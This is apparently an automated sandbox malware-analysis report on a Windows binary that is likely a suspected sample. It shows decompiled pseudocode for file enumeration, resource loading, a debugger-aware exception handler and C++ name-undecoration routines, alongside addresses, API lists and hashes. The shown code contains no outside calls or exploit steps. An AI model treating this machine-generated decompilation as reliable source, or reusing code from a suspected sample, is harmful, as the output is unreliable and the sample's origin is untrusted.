									_t217 = _t217 + 0x10;
									_v632 = _t111;
									__eflags = _v632;
									if(_v632 == 0) {
										E009AE480();
										goto L24;
									} else {
										_v648 = _v632;
										E009AE480();
										E009AE460( &_v616);
										E009AE4C0();
										_t122 = _v648;
									}
								} else {
									_t176 = _v612;
									__eflags =  *((char*)(_t176 + (1 << 0))) - 0x2e;
									if( *((char*)(_t176 + (1 << 0))) != 0x2e) {
										goto L21;
									} else {
										_t177 = _v612;
										__eflags =  *((char*)(_t177 + (1 << 1)));
										if( *((char*)(_t177 + (1 << 1))) != 0) {
											goto L21;
										} else {
											E009AE480();
											goto L24;
										}
									}
								}
							} else {
								_t134 = _v612;
								__eflags =  *((char*)(_t134 + (1 << 0)));
								if( *((char*)(_t134 + (1 << 0))) != 0) {
									goto L17;
								} else {
									E009AE480();
									goto L24;
								}
							}
							goto L28;
							L24:
							_t202 =  &_v600;
							__eflags = FindNextFileW(E009AEDF0( &_v616),  &_v600);
						} while (__eflags != 0);
						_v636 = E009AEFB0(_a12);
						__eflags = _v624 - _v636;
						if(_v624 != _v636) {
							_v606 = 0;
							_t117 = E009AE5C0( &_v606);
							__eflags = _v636 - _v624;
							_t202 = E009AE980(_a12) + _v624 * 4;
							E009C0AE0(_t145, _v624, E009AE980(_a12) + _v624 * 4, _t210, _t211, E009AE980(_a12) + _v624 * 4, _v636 - _v624, 4, _t117);
							_v656 = 0;
							E009AE460( &_v616);
							E009AE4C0();
							_t122 = _v656;
						} else {
							_v652 = 0;
							E009AE460( &_v616);
							E009AE4C0();
							_t122 = _v652;
						}
					} else {
						_v640 = E009AD8A0(_a4, _t210, _a4, 0, 0, _a12);
						E009AE460( &_v616);
						E009AE4C0();
						_t122 = _v640;
					}
				} else {
					_t188 = _a4 + 1;
					__eflags = _v604 - _a4 + 1;
					if(_v604 == _a4 + 1) {
						goto L8;
					} else {
						_t202 = _a12;
						_t122 = E009AD8A0(_t188, _t210, _a4, 0, 0, _a12);
					}
				}
				L28:
				__eflags = _v8 ^ _t213;
				return E00957280(_t122, _t145, _v8 ^ _t213, _t202, _t210, _t211);
			}










































                      0x009adae0
                      0x009adae0
                      0x009adae0
                      0x009adae3
                      0x009adae5
                      0x009adaeb
                      0x009adaf2
                      0x009adaf7
                      0x009adb00
                      0x009adb06
                      0x009adb38
                      0x009adb3d
                      0x009adb40
                      0x009adb40
                      0x009adb51
                      0x009adb54
                      0x009adb7d
                      0x009adb95
                      0x009adb97
                      0x009adbad
                      0x009adb99
                      0x009adba5
                      0x009adba5
                      0x009adbbd
                      0x009adbc9
                      0x009adbe8
                      0x009adbed
                      0x009adbfe
                      0x009adc09
                      0x009adc0e
                      0x009adc11
                      0x009adc56
                      0x009adc5c
                      0x009adc62
                      0x009adc75
                      0x009adc7a
                      0x009adc7d
                      0x009adc8b
                      0x009adc95
                      0x009adc98
                      0x009adcc0
                      0x009adcc8
                      0x009adcd2
                      0x009adcd5
                      0x009add10
                      0x009add26
                      0x009add2b
                      0x009add2e
                      0x009add34
                      0x009add3b
                      0x009add7b
                      0x00000000
                      0x009add3d
                      0x009add43
                      0x009add4f
                      0x009add5a
                      0x009add65
                      0x009add6a
                      0x009add6a
                      0x009adcd7
                      0x009adcdf
                      0x009adce9
                      0x009adcec
                      0x00000000
                      0x009adcee
                      0x009adcf5
                      0x009adcff
                      0x009add01
                      0x00000000
                      0x009add03
                      0x009add09
                      0x00000000
                      0x009add09
                      0x009add01
                      0x009adcec
                      0x009adc9a
                      0x009adca2
                      0x009adcac
                      0x009adcae
                      0x00000000
                      0x009adcb0
                      0x009adcb6
                      0x00000000
                      0x009adcb6
                      0x009adcae
                      0x00000000
                      0x009add80
                      0x009add80
                      0x009add99
                      0x009add99
                      0x009adda9
                      0x009addb5
                      0x009addbb
                      0x009adde7
                      0x009addf3
                      0x009ade01
                      0x009ade16
                      0x009ade1a
                      0x009ade22
                      0x009ade32
                      0x009ade3d
                      0x009ade42
                      0x009addbd
                      0x009addbd
                      0x009addcd
                      0x009addd8
                      0x009adddd
                      0x009adddd
                      0x009adc13
                      0x009adc27
                      0x009adc33
                      0x009adc3e
                      0x009adc43
                      0x009adc43
                      0x009adb56
                      0x009adb59
                      0x009adb5c
                      0x009adb62
                      0x00000000
                      0x009adb64
                      0x009adb64
                      0x009adb70
                      0x009adb75
                      0x009adb62
                      0x009ade48
                      0x009ade4b
                      0x009ade55

                      APIs
                      • FindFirstFileExW.KERNEL32(00000000,00000000,?), ref: 009ADBF1
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009ADBFE
                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 009ADD93
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: FileFind$FirstNextTimevecTimevec::_std::_
                      • String ID:
                      • API String ID: 2141543823-0
                      • Opcode ID: 320ad60db039522150438aa9af9075465eb1fa03cf24b159f780e275cf21e8c6
                      • Instruction ID: 82052dd1014d5210c1d9b89ab5afec077a30480c7b6987b19c1994c0e6690eba
                      • Opcode Fuzzy Hash: 320ad60db039522150438aa9af9075465eb1fa03cf24b159f780e275cf21e8c6
                      • Instruction Fuzzy Hash: 80A180719052689BDB24EF20CCA9BEEB779AFD6300F1045D9E40A6B691DF315E84CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00942B50 Relevance: 4.6, APIs: 3, Instructions: 82COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00942B50(void* __esi, struct HINSTANCE__* _a4, struct HRSRC__* _a8, signed int _a12) {
				signed short* _v8;
				signed short* _v12;
				signed short* _v16;
				void* _v20;
				signed int _v24;
				void* _t40;
				long _t43;
				signed int _t46;
				signed int _t48;
				void* _t68;
				void* _t69;

				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v20 = E009D1520(LoadResource(_a4, _a8), _t69 - _t69);
				if(_v20 != 0) {
					_t40 = LockResource(_v20);
					__eflags = _t69 - _t69;
					_v8 = E009D1520(_t40, _t69 - _t69);
					__eflags = _v8;
					if(__eflags != 0) {
						_t43 = SizeofResource(_a4, _a8);
						__eflags = _t69 - _t69;
						_v16 = E009D1520(_t43, _t69 - _t69);
						_v12 = _v8 + _v16;
						_t46 = _a12 & 0x0000000f;
						__eflags = _t46;
						_v24 = _t46;
						while(1) {
							__eflags = _v24;
							if(_v24 <= 0) {
								break;
							}
							__eflags = _v8 - _v12;
							if(_v8 >= _v12) {
								break;
							}
							_t27 = ( *_v8 & 0x0000ffff) * 2; // 0x2
							_v8 = _v8 + _t27 + 2;
							_v24 = _v24 - 1;
						}
						__eflags = _v8 - _v12;
						if(__eflags < 0) {
							__eflags =  *_v8 & 0x0000ffff;
							if(__eflags != 0) {
								_t48 = _v8;
							} else {
								_t48 = 0;
							}
						} else {
							_t48 = 0;
						}
						goto L13;
					}
					_t48 = 0;
					goto L13;
				} else {
					_t48 = 0;
					L13:
					return E009D1520(_t48, _t68 - _t69 + 0x14);
				}
			}














                      0x00942b5c
                      0x00942b5f
                      0x00942b62
                      0x00942b65
                      0x00942b68
                      0x00942b82
                      0x00942b89
                      0x00942b98
                      0x00942b9e
                      0x00942ba5
                      0x00942ba8
                      0x00942bac
                      0x00942bbc
                      0x00942bc2
                      0x00942bc9
                      0x00942bd2
                      0x00942bd8
                      0x00942bd8
                      0x00942bdb
                      0x00942bde
                      0x00942bde
                      0x00942be2
                      0x00000000
                      0x00000000
                      0x00942be7
                      0x00942bea
                      0x00000000
                      0x00000000
                      0x00942bf5
                      0x00942bf9
                      0x00942c02
                      0x00942c02
                      0x00942c0a
                      0x00942c0d
                      0x00942c19
                      0x00942c1b
                      0x00942c21
                      0x00942c1d
                      0x00942c1d
                      0x00942c1d
                      0x00942c0f
                      0x00942c0f
                      0x00942c0f
                      0x00000000
                      0x00942c0d
                      0x00942bae
                      0x00000000
                      0x00942b8b
                      0x00942b8b
                      0x00942c25
                      0x00942c32
                      0x00942c32

                      APIs
                      • LoadResource.KERNEL32(?,?), ref: 00942B75
                      • LockResource.KERNEL32(00000000), ref: 00942B98
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Resource$LoadLock
                      • String ID:
                      • API String ID: 1037334470-0
                      • Opcode ID: 3a16378c668568cdc8f95230095d4247d53ddddfd2e12742dae52cc4e090fb4c
                      • Instruction ID: 729ca676b2ede5ddae8d05a91bfe08576205c2c479e483cf3031fdc34d71f621
                      • Opcode Fuzzy Hash: 3a16378c668568cdc8f95230095d4247d53ddddfd2e12742dae52cc4e090fb4c
                      • Instruction Fuzzy Hash: FC312D71D11219EFCB54EFA8D581AAEB7F5FF48305F608999E406A7200E7349E80DB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00992720 Relevance: 4.6, APIs: 3, Instructions: 81COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 82%
                      			E00992720(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				char* _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				struct _EXCEPTION_RECORD* _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				long _v808;
				int _v812;
				struct _EXCEPTION_POINTERS _v820;
				signed int _t45;
				struct _EXCEPTION_RECORD* _t49;
				intOrPtr _t59;
				char* _t61;
				char* _t67;
				intOrPtr _t71;
				intOrPtr _t72;
				signed int _t76;
				void* _t77;

				_t72 = __esi;
				_t71 = __edi;
				_t59 = __ebx;
				_t74 = _t76;
				_t77 = _t76 - 0x330;
				_t45 =  *0xa0600c; // 0x5d529087
				_v8 = _t45 ^ _t76;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00958D10(_a4);
					_t77 = _t77 + 4;
				}
				E0095AF80(_t71,  &_v804, 0, 0x50);
				_t67 =  &_v724;
				E0095AF80(_t71, _t67, 0, 0x2cc);
				_t49 =  &_v804;
				_v820.ExceptionRecord = _t49;
				_t61 =  &_v724;
				_v820.ContextRecord = _t61;
				_v548 = _t49;
				_v552 = _t61;
				_v556 = _t67;
				_v560 = _t59;
				_v564 = _t72;
				_v568 = _t71;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v724 = 0x10001;
				_v540 = _v0;
				_v528 =  &_v0;
				_v544 =  *((intOrPtr*)( &_v0 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_t70 = _v0;
				_v792 = _v0;
				_v812 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_v808 = UnhandledExceptionFilter( &_v820);
				if(_v808 == 0 && _v812 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t55 = E00958D10(_t55);
				}
				return E00957280(_t55, _t59, _v8 ^ _t74, _t70, _t71, _t72);
			}





































                      0x00992720
                      0x00992720
                      0x00992720
                      0x00992723
                      0x00992725
                      0x0099272b
                      0x00992732
                      0x00992739
                      0x0099273e
                      0x0099273f
                      0x00992744
                      0x00992744
                      0x00992752
                      0x00992761
                      0x00992768
                      0x00992770
                      0x00992776
                      0x0099277c
                      0x00992782
                      0x00992788
                      0x0099278e
                      0x00992794
                      0x0099279a
                      0x009927a0
                      0x009927a6
                      0x009927ac
                      0x009927b3
                      0x009927ba
                      0x009927c1
                      0x009927c8
                      0x009927cf
                      0x009927d6
                      0x009927d7
                      0x009927dd
                      0x009927ea
                      0x009927f3
                      0x009927ff
                      0x00992808
                      0x00992811
                      0x00992817
                      0x0099281a
                      0x00992826
                      0x0099282e
                      0x00992841
                      0x0099284e
                      0x00992862
                      0x00992863
                      0x00992868
                      0x00992878

                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 00992820
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0099282E
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0099283B
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: dcd66539446b70681adc4433d23a089348cbe71a9f2bd35502c319921b89014a
                      • Instruction ID: 5a2bfe3060f23646247db143826fb5dfc8825de5ce5ffd4ea3201157e6be6cf9
                      • Opcode Fuzzy Hash: dcd66539446b70681adc4433d23a089348cbe71a9f2bd35502c319921b89014a
                      • Instruction Fuzzy Hash: C541E6B4C1122CABCB25DF55D8887D9B7B8BF58314F1082EAE80D66291E7305F85CF85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009675A0 Relevance: 87.9, APIs: 47, Strings: 3, Instructions: 399COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1354 9675a0-9675b1 call 95f3f0 1357 9675b5-9675bf call 96ab70 1354->1357 1360 967a36-967a45 1357->1360 1361 9675c5-9675cf 1357->1361 1363 967a47-967a4b 1360->1363 1364 967a4f-967a59 call 96a560 1360->1364 1361->1360 1362 9675d5-9675e1 1361->1362 1362->1360 1368 9675e7-9675f0 1362->1368 1365 967ac0 1363->1365 1366 967a4d-967ac7 call 95f920 1363->1366 1376 967a67-967ab9 call 960060 call 95f350 call 95fb30 call 95fb70 call 95f820 1364->1376 1377 967a5b-967a65 call 95f920 1364->1377 1370 967acc-967ad8 call 95f240 1365->1370 1366->1370 1372 9675f2-9675fb 1368->1372 1373 967611-96761b call 96a560 1368->1373 1389 967adb-967ade 1370->1389 1372->1373 1379 9675fd-96760c call 95f240 1372->1379 1386 96767c-967688 1373->1386 1387 96761d-967658 call 960060 call 95faa0 call 95f820 1373->1387 1394 967abe 1376->1394 1377->1394 1379->1389 1391 96768e-9676b4 1386->1391 1392 9679ff-967a2c call 96a1e0 call 95fb70 call 95f820 1386->1392 1387->1386 1447 96765a-967678 call 95fad0 call 95f820 1387->1447 1396 9679cf-9679f8 call 965b00 call 95fb70 call 95f820 1391->1396 1397 9676ba-9676c4 1391->1397 1449 967a31 1392->1449 1394->1370 1453 9679fd 1396->1453 1397->1396 1402 9678b6-9678c7 call 95f3f0 1397->1402 1403 9677f1-967842 call 95f080 call 960060 call 95faa0 call 95f820 call 96a590 1397->1403 1404 9677ad-9677ec call 96a1e0 call 95fb70 call 95f820 1397->1404 1405 9676cb-9676e0 1397->1405 1406 967858-9678b1 call 96a1e0 call 95fbb0 call 95fb70 call 95f820 1397->1406 1435 9678cd-9678e7 call 96a1e0 call 96ab70 1402->1435 1492 967844-96784e Replicator::operator+= 1403->1492 1493 967853 1403->1493 1404->1453 1412 967754-9677a3 call 9644c0 call 95fad0 call 95fbb0 call 95fb70 call 95f820 1405->1412 1413 9676e2-9676f6 1405->1413 1406->1453 1487 9677a8 1412->1487 1413->1412 1422 9676f8-967743 call 965e80 call 95fb70 call 95f820 1413->1422 1480 967745-96774d 1422->1480 1481 967752 1422->1481 1475 96794c-967951 call 95f920 1435->1475 1476 9678e9-9678f3 call 96a560 1435->1476 1447->1386 1449->1357 1453->1449 1488 967956-967960 call 96ab70 1475->1488 1490 9678f5-96793c call 960060 call 95fb30 call 95fb70 call 95f820 1476->1490 1491 96793e-967945 call 95f820 1476->1491 1480->1481 1481->1487 1487->1453 1497 967974-96797e call 96ab70 1488->1497 1498 967962-96796e 1488->1498 1500 96794a 1490->1500 1491->1500 1492->1493 1493->1453 1505 9679c3-9679c8 call 95f920 1497->1505 1506 967980-9679c1 call 95fad0 call 95fbb0 call 95f820 1497->1506 1498->1435 1498->1497 1500->1488 1513 9679cd 1505->1513 1506->1513 1513->1453
                      C-Code - Quality: 100%
                      			E009675A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v5;
				char _v16;
				intOrPtr _v20;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v88;
				signed int _v92;
				char _v96;
				signed int _v100;
				char _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				char _v120;
				char _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				char _v232;
				char _v240;
				char _v248;
				char _v256;
				char _v264;
				char _v272;
				char _v280;
				char _v288;
				char _v296;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				signed int _t131;
				signed int _t142;
				signed int _t144;
				intOrPtr _t145;
				signed int _t149;
				intOrPtr _t153;
				void* _t177;
				void* _t180;
				void* _t185;
				signed int _t201;
				signed int _t205;
				signed int _t226;
				signed int _t229;
				void* _t243;
				void* _t244;
				void* _t245;

				_t244 = __esi;
				_t243 = __edi;
				_t185 = __ebx;
				E0095F3F0( &_v16);
				_v5 = 0;
				while(E0096AB70( &_v16) == 0) {
					_t142 =  *0xb30640; // 0x0
					if( *_t142 == 0) {
						break;
					}
					_t229 =  *0xb30640; // 0x0
					if( *_t229 == 0x40) {
						break;
					}
					if(( *0xb3064c & 0x000000ff) == 0) {
						L7:
						_t144 = E0096A560( &_v16);
						if(_t144 == 0) {
							_v96 = E00960060("::", 2);
							_v92 = _t229;
							_t177 = E0095FAA0( &_v136,  &_v96,  &_v16);
							_t245 = _t245 + 0x14;
							E0095F820( &_v16, _t177);
							if((_v5 & 0x000000ff) != 0) {
								_t180 = E0095FAD0( &_v144, 0x5b,  &_v16);
								_t245 = _t245 + 0xc;
								E0095F820( &_v16, _t180);
								_v5 = 0;
							}
						}
						_t201 =  *0xb30640; // 0x0
						if( *_t201 != 0x3f) {
							_t145 = E0096A1E0(_t185, _t243, _t244,  &_v296, 1, 0);
							_t245 = _t245 + 0xc;
							_v72 = _t145;
							E0095F820( &_v16, E0095FB70(_v72,  &_v304,  &_v16));
							goto L41;
						} else {
							_t149 =  *0xb30640; // 0x0
							 *0xb30640 = _t149 + 1;
							_t205 =  *0xb30640; // 0x0
							_v20 =  *_t205;
							_v20 = _v20 - 0x24;
							if(_v20 > 0x2d) {
								L38:
								_t153 = E00965B00(_t185, _t205, _t243, _t244,  &_v280);
								_t245 = _t245 + 4;
								_v68 = _t153;
								E0095F820( &_v16, E0095FB70(_v68,  &_v288,  &_v16));
								L39:
								L41:
								continue;
							}
							_t24 = _v20 + 0x967af8; // 0xcccccc04
							switch( *((intOrPtr*)(( *_t24 & 0x000000ff) * 4 +  &M00967AE0))) {
								case 0:
									 *0xb30640 =  *0xb30640 - 1;
									 *0xb30640 =  *0xb30640 - 1;
									__ecx =  &_v200;
									_v48 = E0096A1E0(__ebx, __edi, __esi,  &_v200, 1, 0);
									__edx =  &_v16;
									__eax =  &_v208;
									__ecx = _v48;
									__eax = E0095FB70(_v48,  &_v208,  &_v16);
									__ecx =  &_v16;
									__eax = E0095F820(__ecx, __eax);
									goto L39;
								case 1:
									__ecx =  &_v128;
									__eax = E0095F080( &_v128, 0xb30640, 0x40);
									_v104 = E00960060("`anonymous namespace\'", 0x15);
									_v100 = __edx;
									__ecx =  &_v16;
									__edx =  &_v104;
									 &_v216 = E0095FAA0( &_v216,  &_v104,  &_v16);
									__ecx =  &_v16;
									__eax = E0095F820( &_v16, __eax);
									__ecx =  *0xb30638; // 0x0
									__eax = E0096A590(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										__ecx =  &_v128;
										__ecx =  *0xb30638; // 0x0
										__eax = L0095FF70(__ecx,  &_v128);
									}
									goto L39;
								case 2:
									_t210 =  *0xb30640; // 0x0
									__eflags =  *((char*)(_t210 + (1 << 0))) - 0x5f;
									if(__eflags != 0) {
										L18:
										_t160 = E0095FAD0( &_v176, 0x60, E009644C0(_t185, _t243, _t244, __eflags,  &_v168));
										_t245 = _t245 + 0x10;
										_v40 = _t160;
										_v44 = E0095FBB0(_v40,  &_v184, 0x27);
										E0095F820( &_v16, E0095FB70(_v44,  &_v192,  &_v16));
										L19:
										goto L39;
									}
									_t216 =  *0xb30640; // 0x0
									__eflags =  *((char*)(_t216 + (1 << 1))) - 0x3f;
									if(__eflags != 0) {
										goto L18;
									}
									_t167 =  *0xb30640; // 0x0
									 *0xb30640 = _t167 + 1;
									_t169 = E00965E80(_t185, _t243, _t244,  &_v152, 0, 0);
									_t245 = _t245 + 0xc;
									_v36 = _t169;
									E0095F820( &_v16, E0095FB70(_v36,  &_v160,  &_v16));
									_t220 =  *0xb30640; // 0x0
									__eflags =  *_t220 - 0x40;
									if( *_t220 == 0x40) {
										_t173 =  *0xb30640; // 0x0
										_t174 = _t173 + 1;
										__eflags = _t174;
										 *0xb30640 = _t174;
									}
									goto L19;
								case 3:
									 *0xb30640 =  *0xb30640 + 1;
									 *0xb30640 =  *0xb30640 + 1;
									__eax =  &_v224;
									_v52 = E0096A1E0(__ebx, __edi, __esi,  &_v224, 1, 0);
									__ecx =  &_v232;
									__ecx = _v52;
									_v56 = E0095FBB0(_v52,  &_v232, 0x5d);
									__edx =  &_v16;
									__eax =  &_v240;
									__ecx = _v56;
									__eax = E0095FB70(_v56,  &_v240,  &_v16);
									__ecx =  &_v16;
									__eax = E0095F820(__ecx, __eax);
									_v5 = 1;
									goto L39;
								case 4:
									__ecx =  &_v28;
									__eax = E0095F3F0( &_v28);
									__ecx =  *0xb30640; // 0x0
									__ecx = __ecx + 1;
									__eflags = __ecx;
									 *0xb30640 = __ecx;
									while(1) {
										__edx =  &_v88;
										__eax = E0096A1E0(__ebx, __edi, __esi,  &_v88, 1, 0);
										__ecx =  &_v88;
										__eax = E0096AB70( &_v88);
										__eflags = __eax;
										if(__eax != 0) {
											__ecx =  &_v28;
											__eax = E0095F920( &_v28, 2);
										} else {
											__ecx =  &_v28;
											__eax = E0096A560( &_v28);
											__eflags = __eax;
											if(__eax != 0) {
												__ecx =  &_v88;
												__ecx =  &_v28;
												__eax = E0095F820( &_v28,  &_v88);
											} else {
												_v112 = E00960060("::", 2);
												_v108 = __edx;
												__eax =  &_v112;
												__ecx =  &_v248;
												__ecx =  &_v88;
												_v60 = E0095FB30( &_v88,  &_v248,  &_v112);
												__edx =  &_v28;
												__eax =  &_v256;
												__ecx = _v60;
												__eax = E0095FB70(_v60,  &_v256,  &_v28);
												__ecx =  &_v28;
												__eax = E0095F820( &_v28, __eax);
											}
										}
										__ecx =  &_v28;
										__eax = E0096AB70( &_v28);
										__eflags = __eax;
										if(__eax != 0) {
											break;
										}
										__edx =  *0xb30640; // 0x0
										__eax =  *__edx;
										__eflags =  *__edx - 0x40;
										if( *__edx != 0x40) {
											continue;
										}
										break;
									}
									__ecx =  &_v28;
									__eax = E0096AB70( &_v28);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx =  &_v16;
										__eax = E0095F920(__ecx, 2);
									} else {
										__ecx =  &_v28;
										__edx =  &_v264;
										_v64 = E0095FAD0( &_v264, 0x5b,  &_v28);
										__eax =  &_v272;
										__ecx = _v64;
										__eax = E0095FBB0(_v64,  &_v272, 0x5d);
										__ecx =  &_v16;
										__eax = E0095F820( &_v16, __eax);
										__ecx =  *0xb30640; // 0x0
										__ecx = __ecx + 1;
										 *0xb30640 = __ecx;
									}
									goto L39;
								case 5:
									goto L38;
							}
						}
					}
					_t229 =  *0xb3064d & 0x000000ff;
					if(_t229 != 0) {
						goto L7;
					}
					E0095F240(_a4,  &_v16);
					return _a4;
				}
				_t226 =  *0xb30640; // 0x0
				_v32 =  *_t226;
				if(_v32 == 0) {
					_t131 = E0096A560( &_v16);
					if(_t131 == 0) {
						_v120 = E00960060("::", 2);
						_v116 = _t226;
						_v76 = E0095F350( &_v312, 1);
						_v80 = E0095FB30(_v76,  &_v320,  &_v120);
						E0095F820( &_v16, E0095FB70(_v80,  &_v328,  &_v16));
					} else {
						E0095F920( &_v16, 1);
					}
				} else {
					if(_v32 != 0x40) {
						E0095F920( &_v16, 2);
					}
				}
				E0095F240(_a4,  &_v16);
				return _a4;
			}







































































                      0x009675a0
                      0x009675a0
                      0x009675a0
                      0x009675ac
                      0x009675b1
                      0x009675b5
                      0x009675c5
                      0x009675cf
                      0x00000000
                      0x00000000
                      0x009675d5
                      0x009675e1
                      0x00000000
                      0x00000000
                      0x009675f0
                      0x00967611
                      0x00967614
                      0x0096761b
                      0x0096762c
                      0x0096762f
                      0x00967641
                      0x00967646
                      0x0096764d
                      0x00967658
                      0x00967667
                      0x0096766c
                      0x00967673
                      0x00967678
                      0x00967678
                      0x00967658
                      0x0096767c
                      0x00967688
                      0x00967a0a
                      0x00967a0f
                      0x00967a12
                      0x00967a2c
                      0x00000000
                      0x0096768e
                      0x0096768e
                      0x00967696
                      0x0096769b
                      0x009676a4
                      0x009676ad
                      0x009676b4
                      0x009679cf
                      0x009679d6
                      0x009679db
                      0x009679de
                      0x009679f8
                      0x009679fd
                      0x00967a31
                      0x00000000
                      0x00967a31
                      0x009676bd
                      0x009676c4
                      0x00000000
                      0x009677b2
                      0x009677b5
                      0x009677be
                      0x009677cd
                      0x009677d0
                      0x009677d4
                      0x009677db
                      0x009677de
                      0x009677e4
                      0x009677e7
                      0x00000000
                      0x00000000
                      0x009677f8
                      0x009677fb
                      0x0096780f
                      0x00967812
                      0x00967815
                      0x00967819
                      0x00967824
                      0x0096782d
                      0x00967830
                      0x00967835
                      0x0096783b
                      0x00967840
                      0x00967842
                      0x00967844
                      0x00967848
                      0x0096784e
                      0x0096784e
                      0x00000000
                      0x00000000
                      0x009676d3
                      0x009676dd
                      0x009676e0
                      0x00967754
                      0x0096776d
                      0x00967772
                      0x00967775
                      0x00967789
                      0x009677a3
                      0x009677a8
                      0x00000000
                      0x009677a8
                      0x009676e9
                      0x009676f3
                      0x009676f6
                      0x00000000
                      0x00000000
                      0x009676f8
                      0x00967700
                      0x00967710
                      0x00967715
                      0x00967718
                      0x00967732
                      0x00967737
                      0x00967740
                      0x00967743
                      0x00967745
                      0x0096774a
                      0x0096774a
                      0x0096774d
                      0x0096774d
                      0x00000000
                      0x00000000
                      0x0096785e
                      0x00967861
                      0x0096786b
                      0x0096787a
